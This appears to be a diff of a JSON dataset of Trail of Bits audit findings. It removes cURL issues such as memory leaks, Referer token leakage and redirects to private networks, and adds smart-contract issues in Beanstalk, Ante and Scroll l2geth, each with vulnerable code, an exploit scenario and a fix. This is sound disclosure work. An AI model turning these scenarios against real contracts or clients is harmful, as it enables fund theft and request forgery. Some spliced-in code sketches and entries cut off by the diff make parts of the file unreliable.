==2798691==ERROR: LeakSanitizer: detected memory leaks Direct leak of 3 byte(s) in 1 object(s) allocated from: #0 0x7fbc6811b3ed in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cc:445 #1 0x56412ed047ee in getparameter /home/scooby/curl/src/tool_getparam.c:1885 SUMMARY: AddressSanitizer: 3 byte(s) leaked in 1 allocation(s). Figure 11.2: Reproducing a memory leak in the tool_getparam.c file, with LeakSanitizer log $ curl --proto=0 --proto=0 Warning: unrecognized protocol '0' Warning: unrecognized protocol '0' curl: no URL specified! curl: try 'curl --help' or 'curl --manual' for more information ================================================================= ==2799783==ERROR: LeakSanitizer: detected memory leaks Direct leak of 1 byte(s) in 1 object(s) allocated from: #0 0x7f90391803ed in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cc:445 #1 0x55e405955ab7 in proto2num /home/scooby/curl/src/tool_paramhlp.c:385 SUMMARY: AddressSanitizer: 1 byte(s) leaked in 1 allocation(s). Figure 11.3: Reproducing a memory leak in the tool_paramhlp.c file, with LeakSanitizer log Exploit Scenario An attacker finds a way to allocate large amounts of memory on the local machine, which leads to the overconsumption of resources and a denial-of-service attack. Recommendations Short term, fix the memory leaks described in this finding by freeing memory blocks that are no longer needed. Long term, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using the argv-fuzz-inl.h from the AFL++ project to build argv from stdin in cURL. Also, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or cURL's manual.",
"labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Medium" ] }, { - "title": "12. Referer header is generated in insecure manner ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "cURL automatically sets the referer header for HTTP redirects when provided with the --referer ;auto flag. The header set contains the entire original URL except for the user-password fragment. 
The URL includes query parameters, which is against current best practices for handling the referer, which say to default to the strict-origin-when-cross-origin option. That option instructs clients to send only the URL's origin on cross-origin redirects, and not to send the header to less secure destinations (e.g., when redirecting from HTTPS to HTTP). Exploit Scenario A user uses cURL to send a request to a server that requires multi-step authorization. He provides the authorization token as a query parameter and enables redirects with the --location flag. Because of a server misconfiguration, a 302 redirect response with an incorrect Location header that points to a third-party domain is sent back to cURL. cURL requests the third-party domain, leaking the authorization token via the referer header. Recommendations Short term, send only the origin instead of the whole URL in the referer header on cross-origin requests. Consider not sending the header on redirects that downgrade the security level. Additionally, consider implementing support for the Referrer-Policy response header. Alternatively, introduce a new flag that would allow users to set the desired referrer policy manually. Long term, review response headers that change the behavior of HTTP redirects and ensure either that they are supported by cURL or that secure defaults are implemented. References Feature: Referrer Policy: Default to strict-origin-when-cross-origin", + "title": "7. Syncing nodes fail to check consensus rule for L1 message count ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "l2geth adds a consensus rule requiring that there be no more than L1Config.NumL1MessagesPerBlock L1 messages per L2 block. This rule is checked by the sequencer when building new blocks but is not checked by syncing nodes through the ValidateL1Messages function, as shown in figure 7.1. // TODO: consider adding a rule to enforce L1Config.NumL1MessagesPerBlock. // If there are L1 messages available, sequencer nodes should include them. // However, this is hard to enforce as different nodes might have different views of L1. Figure 7.1: The ValidateL1Messages function does not check the NumL1MessagesPerBlock restriction. (go-ethereum/core/block_validator.go#145-147) The TODO comment shown in the figure expresses a concern that syncing nodes cannot enforce NumL1MessagesPerBlock due to the different views of L1 that the nodes may have; however, this issue does not prevent syncing nodes from simply checking the number of L1 messages included in the block. Exploit Scenario A malicious sequencer ignores the NumL1MessagesPerBlock restriction while constructing a block, thus bypassing the consensus rules. Follower nodes consider the block to be valid even though the consensus rule is violated. Recommendations Short term, add a check to ValidateL1Messages that enforces the maximum number of L1 messages per block. Long term, document and check all changes to the system's consensus rules to ensure that both nodes that construct blocks and nodes that sync blocks check the consensus rules. This includes having syncing nodes check whether an L1 transaction actually exists on the L1, a concern expressed in comments further up in the ValidateL1Messages function.
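The missing syncing-node check is small; a sketch with simplified stand-ins for the real l2geth block and transaction types (the IsL1Message flag is an assumption for illustration):

package main

import "fmt"

// Sketch of the check ValidateL1Messages is missing: count the L1
// messages a block includes and reject the block when the cap is
// exceeded. This does not require a node to share the sequencer's
// view of L1; it only counts what the block itself contains.
type tx struct{ IsL1Message bool }

func validateL1MessageCount(txs []tx, maxPerBlock int) error {
	count := 0
	for _, t := range txs {
		if t.IsL1Message {
			count++
		}
	}
	if count > maxPerBlock {
		return fmt.Errorf("block includes %d L1 messages, cap is %d", count, maxPerBlock)
	}
	return nil
}

func main() {
	block := []tx{{true}, {true}, {false}, {true}}
	fmt.Println(validateL1MessageCount(block, 2)) // block includes 3 L1 messages, cap is 2
}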
A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", "Severity: Low", @@ -1570,239 +1560,2939 @@ ] }, { - "title": "13. Redirect to localhost and local network is possible (Server-side request forgery like) ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "When redirects are enabled with cURL (i.e., the --location flag is provided), a server may redirect a request to an arbitrary endpoint, and cURL will issue a request to it. This gives requested servers partial access to cURL users' local networks. The issue is similar to the Server-Side Request Forgery (SSRF) attack vector, but in the context of the client application. Exploit Scenario A user sends a request using cURL to a malicious server using the --location flag. The server responds with a 302 redirect to the http://192.168.0.1:1080?malicious=data endpoint, accessing the user's router admin panel. Recommendations Short term, add a warning about this attack vector to the --location flag documentation. Long term, consider disallowing redirects to private networks and the loopback interface, either by introducing a new flag that would disable the restriction or by extending the --location-trusted flag functionality.", + "title": "1. Attackers could mint more Fertilizer than intended due to an unused variable ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "Due to an unused local variable, an attacker could mint more Fertilizer than should be allowed by the sale. The mintFertilizer() function checks that the _amount variable is no greater than the remaining variable; this ensures that more Fertilizer than intended cannot be minted; however, the _amount variable is not used in subsequent function calls; instead, the amount variable is used. The code effectively skips this check, allowing users to mint more Fertilizer than required to recapitalize the protocol. function mintFertilizer ( uint128 amount , uint256 minLP , LibTransfer.From mode ) external payable { uint256 remaining = LibFertilizer.remainingRecapitalization(); uint256 _amount = uint256 (amount); if (_amount > remaining) _amount = remaining; LibTransfer.receiveToken( C.usdc(), uint256 ( amount ).mul(1e6), msg.sender , mode ); uint128 id = LibFertilizer.addFertilizer( uint128 (s.season.current), amount , minLP ); C.fertilizer().beanstalkMint( msg.sender , uint256 (id), amount , s.bpf); } Figure 1.1: The mintFertilizer() function in FertilizerFacet.sol#L35- Note that this flaw can be exploited only once: if users mint more Fertilizer than intended, the remainingRecapitalization() function returns 0 because the dollarPerUnripeLP() and unripeLP().totalSupply() variables are constants. function remainingRecapitalization() internal view returns (uint256 remaining) { AppStorage storage s = LibAppStorage.diamondStorage(); uint256 totalDollars = C .dollarPerUnripeLP() .mul(C.unripeLP().totalSupply()) .div(DECIMALS); if (s.recapitalized >= totalDollars) return 0; return totalDollars.sub(s.recapitalized); } Figure 1.2: The remainingRecapitalization() function in LibFertilizer.sol#L132-145 Exploit Scenario Recapitalization of the Beanstalk protocol is almost complete; only 100 units of Fertilizer for sale remain. Eve, a malicious user, calls mintFertilizer() with an amount of 10 million, significantly over-funding the system. Because the Fertilizer supply increased significantly above the theoretical maximum, other users are entitled to a much smaller yield than expected.
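The root cause reads clearly in miniature. The sketch below recreates the pattern in Go for illustration (it is not the Solidity code itself; Go rejects a truly dead store, so the unused copy is kept alive with a blank assignment):

package main

import "fmt"

// The shape of the bug: a clamped copy of the argument is computed,
// but later logic keeps using the unclamped argument.
func mintFertilizer(amount, remaining uint64) uint64 {
	clamped := amount
	if clamped > remaining {
		clamped = remaining
	}
	_ = clamped   // the clamp is never consulted again...
	return amount // ...so the caller can overshoot `remaining`
}

func main() {
	fmt.Println(mintFertilizer(10_000_000, 100)) // 10000000, not 100
}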
Recommendations Short term, use _amount instead of amount as the parameter in the functions that are called after mintFertilizer(). Long term, thoroughly document the expected behavior of the FertilizerFacet contract and the properties (invariants) it should enforce, such as token amounts above the maximum recapitalization threshold cannot be sold. Expand the unit test suite to test that these properties hold.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: Low" ] }, { "title": "2. Lack of a two-step process for ownership transfer ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", "body": "The transferOwnership() function is used to change the owner of the Beanstalk protocol. This function calls the setContractOwner() function, which immediately sets the contract's new owner. Transferring ownership in one function call is error-prone and could result in irrevocable mistakes. function transferOwnership ( address _newOwner ) external override { LibDiamond.enforceIsContractOwner(); LibDiamond.setContractOwner(_newOwner); } Figure 2.1: The transferOwnership() function in OwnershipFacet.sol#L13-16 Exploit Scenario The owner of the Beanstalk contracts is a community-controlled multisignature wallet. The community agrees to upgrade to an on-chain voting system, but the wrong address is mistakenly provided to its call to transferOwnership(), permanently misconfiguring the system. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: High" ] }, { - "title": "14. URL parsing from redirect is incorrect when no path separator is provided ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "When cURL parses a URL from the Location header for an HTTP redirect and the URL does not contain a path separator (/), cURL incorrectly duplicates query strings (i.e., data after the question mark) and fragments (data after the hash mark). cURL correctly parses similar URLs when they are provided directly on the command line. This behavior indicates that different parsers are used for direct URLs and URLs from redirects, which may lead to further bugs. $ curl -v -L 'http://local.test?redirect=http://local.test:80?-123' * Trying 127.0.0.1:80... * Connected to local.test (127.0.0.1) port 80 (#0) > GET /?redirect=http://local.test:80?-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Location: http://local.test:80?-123 < Date: Mon, 10 Oct 2022 14:53:46 GMT < Connection: keep-alive < Keep-Alive: timeout=5 < Transfer-Encoding: chunked < * Ignoring the response-body * Connection #0 to host local.test left intact * Issue another request to this URL: 'http://local.test:80/?-123?-123' * Found bundle for host: 0x6000039287b0 [serially] * Re-using existing connection #0 with host local.test * Connected to local.test (127.0.0.1) port 80 (#0) > GET /?-123?-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Mon, 10 Oct 2022 14:53: < Connection: keep-alive < Keep-Alive: timeout=5 < Content-Length: 16 < * Connection #0 to host local.test left intact HTTP Connection! Figure 14.1: Example logging output from cURL, presenting the bug in parsing URLs from the Location header, with port and query parameters $ curl -v -L 'http://local.test?redirect=http://local.test%23-123' * Trying 127.0.0.1:80... 
* Connected to local.test (127.0.0.1) port 80 (#0) > GET /?redirect=http://local.test%23-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Location: http://local.test#-123 < Date: Mon, 10 Oct 2022 14:56:05 GMT < Connection: keep-alive < Keep-Alive: timeout=5 < Transfer-Encoding: chunked < * Ignoring the response-body * Connection #0 to host local.test left intact * Issue another request to this URL: 'http://local.test/#-123#-123' * Found bundle for host: 0x6000003f47b0 [serially] * Re-using existing connection #0 with host local.test * Connected to local.test (127.0.0.1) port 80 (#0) > GET / HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Mon, 10 Oct 2022 14:56:05 GMT < Connection: keep-alive < Keep-Alive: timeout=5 < Content-Length: 16 < * Connection #0 to host local.test left intact HTTP Connection! Figure 14.2: Example logging output from cURL, presenting the bug in parsing URLs from the Location header, without port and with fragment Exploit Scenario A user of cURL accesses data from a server. The server redirects cURL to another endpoint. cURL incorrectly duplicates the query string in the new request. The other endpoint uses the incorrect data, which negatively affects the user. Recommendations Short term, fix the parsing bug in the Location header parser. Long term, use a single, centralized API for URL parsing in the whole cURL codebase. Expand tests with checks of parsing of redirect responses.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: High" ] }, { "title": "1. AntePoolFactory does not validate create2 return addresses ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", "body": "The AntePoolFactory uses the create2 instruction to deploy an AntePool and then initializes it with an already-deployed AnteTest address. 
However, the AntePoolFactory does not validate the address returned by create2, which will be the zero address if the deployment operation fails. bytes memory bytecode = type(AntePool).creationCode; bytes32 salt = keccak256(abi.encodePacked(testAddr)); assembly { testPool := create2(0, add(bytecode, 0x20), mload(bytecode), salt) } poolMap[testAddr] = testPool; allPools.push(testPool); AntePool(testPool).initialize(anteTest); emit AntePoolCreated(testAddr, testPool); Figure 1.1: contracts/AntePoolFactory.sol#L35-L47 This lack of validation does not currently pose a problem, because the simplicity of AntePool contracts helps prevent deployment failures (and thus the return of the zero address). However, deployment issues could become more likely in future iterations of the Ante Protocol. Recommendations Short term, have the AntePoolFactory check the address returned by the create2 operation against the zero address. Long term, ensure that the results of operations that return a zero address in the event of a failure (such as create2 and ecrecover operations) are validated appropriately.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: High" ] }, { "title": "3. Possible underflow could allow more Fertilizer than MAX_RAISE to be minted ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", "body": "The remaining() function could underflow, which could allow the Barn Raise to continue indefinitely. Fertilizer is an ERC1155 token issued for participation in the Barn Raise, a community fundraiser intended to recapitalize the Beanstalk protocol with Bean and liquidity provider (LP) tokens that were stolen during the April 2022 governance hack. Fertilizer entitles holders to a pro rata portion of one-third of minted Bean tokens if the Fertilizer token is active, and it can be minted as long as the recapitalization target ($77 million) has not been reached. Users who want to buy Fertilizer call the mint() function and provide one USDC for each Fertilizer token they want to mint. function mint(uint256 amount) external payable nonReentrant { uint256 r = remaining(); if (amount > r) amount = r; __mint(amount); IUSDC.transferFrom(msg.sender, CUSTODIAN, amount); } Figure 3.1: The mint() function in FertilizerPremint.sol#L51-56 The mint() function first checks how many Fertilizer tokens remain to be minted by calling the remaining() function (figure 3.2); if the user is trying to mint more Fertilizer than available, the mint() function mints all of the Fertilizer tokens that remain. function remaining() public view returns (uint256) { return MAX_RAISE - IUSDC.balanceOf(CUSTODIAN); } Figure 3.2: The remaining() function in FertilizerPremint.sol#L84- However, the FertilizerPremint contract does not use Solidity 0.8, so it does not have native overflow and underflow protection. As a result, if the amount of Fertilizer purchased reaches MAX_RAISE (i.e., 77 million), an attacker could simply send one USDC to the CUSTODIAN wallet to cause the remaining() function to underflow, allowing the sale to continue indefinitely. In this particular case, Beanstalk protocol funds are not at risk because all the USDC used to purchase Fertilizer tokens is sent to a Beanstalk community-owned multisignature wallet; however, users who buy Fertilizer after such an exploit would lose the gas funds they spent, and the project would incur further reputational damage. Exploit Scenario The Barn Raise is a total success: the MAX_RAISE amount is hit, meaning that 77 million Fertilizer tokens have been minted.
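What the attack relies on is the unchecked subtraction wrapping around, illustrated below with uint64 in Go (the contract's arithmetic is uint256, but the wrap behaves the same way):

package main

import "fmt"

// With pre-0.8 unchecked arithmetic, remaining() wraps once the
// custodian balance exceeds the cap, reopening the sale.
func remainingUnchecked(maxRaise, balance uint64) uint64 {
	return maxRaise - balance // wraps to a huge value when balance > maxRaise
}

func main() {
	const maxRaise = 77_000_000
	fmt.Println(remainingUnchecked(maxRaise, maxRaise))   // 0: sale complete
	fmt.Println(remainingUnchecked(maxRaise, maxRaise+1)) // 18446744073709551615: sale reopens
}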
Alice, a malicious user, notices the underflow risk in the remaining() function; she sends one USDC to the CUSTODIAN wallet, triggering the underflow and causing the function to return the maximum uint256 value instead of MAX_RAISE. As a result, the sale continues even though the MAX_RAISE amount was reached. Other users, not knowing that the Barn Raise should be complete, continue to successfully mint Fertilizer tokens until the bug is discovered and the system is paused to address the issue. While no Beanstalk funds are lost as a result of this exploit, the users who continued minting Fertilizer after the MAX_RAISE was reached lose all the gas funds they spent. Recommendations Short term, add a check in the remaining() function so that it returns 0 if USDC.balanceOf(CUSTODIAN) is greater than or equal to MAX_RAISE. This will prevent the underflow from being triggered. Because the function depends on the CUSTODIAN's balance, it is still possible for someone to send USDC directly to the CUSTODIAN wallet and reduce the amount of available Fertilizer; however, attackers would lose their money in the process, meaning that there are no incentives to perform this kind of action. Long term, thoroughly document the expected behavior of the FertilizerPremint contract and the properties (invariants) it should enforce, such as no tokens can be minted once the MAX_RAISE is reached. Expand the unit test suite to test that these properties hold.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: Low" ] }, { "title": "4. Risk of Fertilizer id collision that could result in loss of funds ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", "body": "If a user mints Fertilizer tokens twice during two different seasons, the same token id for both tokens could be calculated, and the first entry will be overridden; if this occurs and the bpf value changes, the user would be entitled to less yield than expected. 
To mint new Fertilizer tokens, users call the mintFertilizer() function in the FertilizerFacet contract. An id is calculated for each new Fertilizer token that is minted; not only is this id an identifier for the token, but it also represents the endBpf period, which is the moment at which the Fertilizer reaches maturity and can be redeemed without incurring any penalty. function mintFertilizer( uint128 amount, uint256 minLP, LibTransfer.From mode ) external payable { uint256 remaining = LibFertilizer.remainingRecapitalization(); uint256 _amount = uint256(amount); if (_amount > remaining) _amount = remaining; LibTransfer.receiveToken( C.usdc(), uint256(amount).mul(1e6), msg.sender, mode ); uint128 id = LibFertilizer.addFertilizer( uint128(s.season.current), amount, minLP ); C.fertilizer().beanstalkMint(msg.sender, uint256(id), amount, s.bpf); } Figure 4.1: The mintFertilizer() function in Fertilizer.sol#L35-55 The id is calculated by the addFertilizer() function in the LibFertilizer library as the sum of 1 and the bpf and humidity values. function addFertilizer( uint128 season, uint128 amount, uint256 minLP ) internal returns (uint128 id) { AppStorage storage s = LibAppStorage.diamondStorage(); uint256 _amount = uint256(amount); // Calculate Beans Per Fertilizer and add to total owed uint128 bpf = getBpf(season); s.unfertilizedIndex = s.unfertilizedIndex.add( _amount.mul(uint128(bpf)) ); // Get id id = s.bpf.add(bpf); [...] } function getBpf(uint128 id) internal pure returns (uint128 bpf) { bpf = getHumidity(id).add(1000).mul(PADDING); } function getHumidity(uint128 id) internal pure returns (uint128 humidity) { if (id == REPLANT_SEASON) return 5000; if (id >= END_DECREASE_SEASON) return 200; uint128 humidityDecrease = id.sub(REPLANT_SEASON + 1).mul(5); humidity = RESTART_HUMIDITY.sub(humidityDecrease); } Figure 4.2: The id calculation in LibFertilizer.sol#L32-67 However, the method that generates these token ids does not prevent collisions. The bpf value is always increasing (or does not move), and humidity decreases every season until it reaches 20%. This makes it possible for a user to mint two tokens in two different seasons with different bpf and humidity values and still get the same token id. function beanstalkMint(address account, uint256 id, uint128 amount, uint128 bpf) external onlyOwner { _balances[id][account].lastBpf = bpf; _safeMint( account, id, amount, bytes('0') ); } Figure 4.3: The beanstalkMint() function in Fertilizer.sol#L40-48 An id collision is not necessarily a problem; however, when a token is minted, the value of the lastBpf field is set to the bpf of the current season, as shown in figure 4.3. This field is very important because it is used to determine the penalty, if any, that a user will incur when redeeming Fertilizer. To redeem Fertilizer, users call the claimFertilizer() function, which in turn calls the beanstalkUpdate() function on the Fertilizer contract. 
function claimFertilized(uint256[] calldata ids, LibTransfer.To mode) external payable { uint256 amount = C.fertilizer().beanstalkUpdate(msg.sender, ids, s.bpf); LibTransfer.sendToken(C.bean(), amount, msg.sender, mode); } Figure 4.4: The claimFertilized() function in FertilizerFacet.sol#L27-33 function beanstalkUpdate( address account, uint256[] memory ids, uint128 bpf ) external onlyOwner returns (uint256) { return __update(account, ids, uint256(bpf)); } function __update( address account, uint256[] memory ids, uint256 bpf ) internal returns (uint256 beans) { for (uint256 i = 0; i < ids.length; i++) { uint256 stopBpf = bpf < ids[i] ? bpf : ids[i]; uint256 deltaBpf = stopBpf - _balances[ids[i]][account].lastBpf; if (deltaBpf > 0) { beans = beans.add(deltaBpf.mul(_balances[ids[i]][account].amount)); _balances[ids[i]][account].lastBpf = uint128(stopBpf); } } emit ClaimFertilizer(ids, beans); } Figure 4.5: The update flow in Fertilizer.sol#L32-38 and L72-86 The beanstalkUpdate() function then calls the __update() function. This function first calculates the stopBpf value, which is one of two possible values. If the Fertilizer is being redeemed early, stopBpf is the bpf at which the Fertilizer is being redeemed; if the token is being redeemed at maturity or later, stopBpf is the token id (i.e., the endBpf value). Afterward, __update() calculates the deltaBpf value, which is used to determine the penalty, if any, that the user will incur when redeeming the token; deltaBpf is calculated using the stopBpf value that was already defined and the lastBpf value, which is the bpf corresponding to the last time the token was redeemed or, if it was never redeemed, the bpf at the moment the token was minted. Finally, the token's lastBpf field is updated to the stopBpf. Because of the id collision, users could accidentally mint Fertilizer tokens with the same id in two different seasons and override their first mint's lastBpf field, ultimately reducing the amount of yield they are entitled to. Exploit Scenario Imagine the following scenario: It is currently the first season; the bpf is 0 and the humidity is 40%. Alice mints 100 Fertilizer tokens with an id of 41 (the sum of 1 and the bpf (0) and humidity (40) values), and lastBpf is set to 0. Some time goes by, and it is now the third season; the bpf is 35 and the humidity is 5%. Alice mints one additional Fertilizer token with an id of 41 (the sum of 1 and the bpf (35) and humidity (5) values), and lastBpf is set to 35. Because of the second mint, the lastBpf field of Alice's Fertilizer tokens is overridden, making her lose a substantial amount of the yield she was entitled to: Using the formula for calculating the number of BEAN tokens that users are entitled to, shown in figure 4.5, Alice's original yield at maturity would have been 4,100 tokens: deltaBpf = id - lastBpf = 41 - 0 = 41 balance = 100 beans received = deltaBpf * balance = 41 * 100 = 4100 As a result of the overridden lastBpf field, Alice's yield instead ends up being only 606 tokens: deltaBpf = id - lastBpf = 41 - 35 = 6 balance = 101 beans received = deltaBpf * balance = 6 * 101 = 606
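The id arithmetic in this scenario is easy to verify: with the id computed as the sum of 1, bpf, and humidity (per the finding's description of figure 4.2), two different seasons land on the same id. A quick illustration:

package main

import "fmt"

// id = 1 + bpf + humidity, following the finding's simplification of
// the figure 4.2 calculation.
func fertilizerID(bpf, humidity uint64) uint64 { return 1 + bpf + humidity }

func main() {
	fmt.Println(fertilizerID(0, 40)) // season 1 (bpf 0, humidity 40%) -> 41
	fmt.Println(fertilizerID(35, 5)) // season 3 (bpf 35, humidity 5%) -> 41: collision
}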
However, these alternate remedies could introduce new edge cases or could result in a degraded user experience; if either alternate remedy is implemented, it would need to be thoroughly documented to inform users of its particular behavior.

Long term, thoroughly document the expected behavior of the associated code and include regression tests to prevent similar issues from being introduced in the future. Additionally, exercise caution when using one variable to serve two purposes. Gas savings should be measured and weighed against the increased complexity. Developers should be aware that performing optimizations could introduce new edge cases and increase the code's complexity.",
 "labels": [
 "Trail of Bits",
- "Severity: Informational",
+ "Severity: High",
 "Difficulty: Low"
 ]
 },
 {
- "title": "4. Looping over an array of unbounded size can cause a denial of service ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf",
- "body": "If an AnteTest fails, the _checkTestNoRevert function will return false, causing the checkTest function to call _calculateChallengerEligibility to compute eligibleAmount; this value is the total stake of the eligible challengers and is used to calculate the proportion of _remainingStake owed to each challenger. To calculate eligibleAmount, the _calculateChallengerEligibility function loops through an unbounded array of challenger addresses. When the number of challengers is large, the function will consume a large quantity of gas in this operation.

function _calculateChallengerEligibility() internal {
    uint256 cutoffBlock = failedBlock.sub(CHALLENGER_BLOCK_DELAY);
    for (uint256 i = 0; i < challengers.addresses.length; i++) {
        address challenger = challengers.addresses[i];
        if (eligibilityInfo.lastStakedBlock[challenger] < cutoffBlock) {
            eligibilityInfo.eligibleAmount = eligibilityInfo.eligibleAmount.add(
                _storedBalance(challengerInfo.userInfo[challenger], challengerInfo)
            );
        }
    }
}

Figure 4.1: contracts/AntePool.sol#L553-L563

However, triggering an out-of-gas error would be costly to an attacker; the attacker would need to create many accounts through which to stake funds, and the amount of each stake would decay over time.

Exploit Scenario
The length of the challenger address array grows such that the computation of the eligibleAmount causes the block to reach its gas limit. Then, because of this Ethereum-imposed gas constraint, the entire transaction reverts, and the failing AnteTest is not marked as failing. As a result, challengers who have staked funds in anticipation of a failed test will not receive a payout.

Recommendations
Short term, determine the number of challengers that can enter an AntePool without rendering the _calculateChallengerEligibility function's operation too gas intensive; then, use that number as the upper limit on the number of challengers. Long term, avoid calculating every challenger's proportion of _remainingStake in the same operation; instead, calculate each user's pro-rata share when he or she enters the pool and modify the challenger delay to require that a challenger register and wait 12 blocks before minting his or her pro-rata share. Upon a test failure, a challenger would burn these shares and redeem them for ether.",
+ "title": "5. The sunrise() function rewards callers only with the base incentive ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf",
+ "body": "The increasing incentive that encourages users to call the sunrise() function in a timely manner is not actually applied. According to the Beanstalk white paper, the reward paid to users who call the sunrise() function should increase by 1% every second (for up to 300 seconds) after this method is eligible to be called; this incentive is designed so that, even when gas prices are high, the system can move on to the next season in a timely manner. This increasing incentive is calculated and included in the emitted logs, but it is not actually applied to the number of Bean tokens rewarded to users who call sunrise().

function incentivize(address account, uint256 amount) private {
    uint256 timestamp = block.timestamp.sub(
        s.season.start.add(s.season.period.mul(season()))
    );
    if (timestamp > 300) timestamp = 300;
    uint256 incentive = LibIncentive.fracExp(amount, 100, timestamp, 1);
    C.bean().mint(account, amount);
    emit Incentivization(account, incentive);
}

Figure 5.1: The incentive calculation in SeasonFacet.sol#70-78

Exploit Scenario
Gas prices suddenly increase to the point that it is no longer profitable to call sunrise(). Given the lack of an increasing incentive, the function goes uncalled for several hours, preventing the system from reacting to changing market conditions.

Recommendations
Short term, pass the incentive value instead of amount into the mint() function call (a sketch follows below). Long term, thoroughly document the expected behavior of the SeasonFacet contract and the properties (invariants) it should enforce, such as the property that the caller of the sunrise() function receives the correct incentive. Expand the unit test suite to test that these properties hold. Additionally, thoroughly document how the system would be affected if the sunrise() function were not called for a long period of time (e.g., in times of extreme network congestion). Finally, determine whether the Beanstalk team should rely exclusively on third parties to call the sunrise() function or whether an alternate system managed by the Beanstalk team should be adopted in addition to the current system. For example, an alternate system could involve an off-chain monitoring system and a trusted execution flow.
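A minimal sketch of the short-term fix, identical to figure 5.1 except for the mint call:

// Sketch of the corrected incentivize(): the computed incentive, not the
// base amount, is minted to the caller.
function incentivize(address account, uint256 amount) private {
    uint256 timestamp = block.timestamp.sub(
        s.season.start.add(s.season.period.mul(season()))
    );
    if (timestamp > 300) timestamp = 300;
    uint256 incentive = LibIncentive.fracExp(amount, 100, timestamp, 1);
    C.bean().mint(account, incentive); // was: C.bean().mint(account, amount)
    emit Incentivization(account, incentive);
}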
",
 "labels": [
 "Trail of Bits",
- "Severity: Low",
- "Difficulty: Undetermined"
+ "Severity: Medium",
+ "Difficulty: Low"
 ]
 },
 {
- "title": "2. Events emitted during critical operations omit certain details ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf",
- "body": "Events are generally emitted for all critical state-changing operations within the system. However, the AntePoolCreated event emitted by the AntePoolFactory does not capture the address of the msg.sender that deployed the AntePool. This information would help provide a more complete audit trail in the event of an attack, as the msg.sender often refers to the externally owned account that sent the transaction but could instead refer to an intermediate smart contract address.

emit AntePoolCreated(testAddr, testPool);

Figure 2.1: contracts/AntePoolFactory.sol#L47

Additionally, consider having the AntePool.updateDecay method emit an event with the pool share parameters used in decay calculations.

Recommendations
Short term, capture the msg.sender in the AntePoolFactory.AntePoolCreated event, and have AntePool.updateDecay emit an event that includes the relevant decay calculation parameters. Long term, ensure critical state-changing operations trigger events sufficient to form an audit trail in the event of a system failure. Events should capture relevant parameters to help auditors determine the cause of failure.",
+ "title": "6. Solidity compiler optimizations can be problematic ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf",
+ "body": "Beanstalk has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations.

Exploit Scenario
A latent or future bug in Solidity compiler optimizations (or in the Emscripten transpilation to solc-js) causes a security vulnerability in the Beanstalk contracts.

Recommendations
Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.",
 "labels": [
 "Trail of Bits",
- "Severity: Low",
- "Difficulty: Undetermined"
+ "Severity: Informational",
+ "Difficulty: Low"
 ]
 },
 {
- "title": "3. Insufficient gas can cause AnteTests to produce false positives ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf",
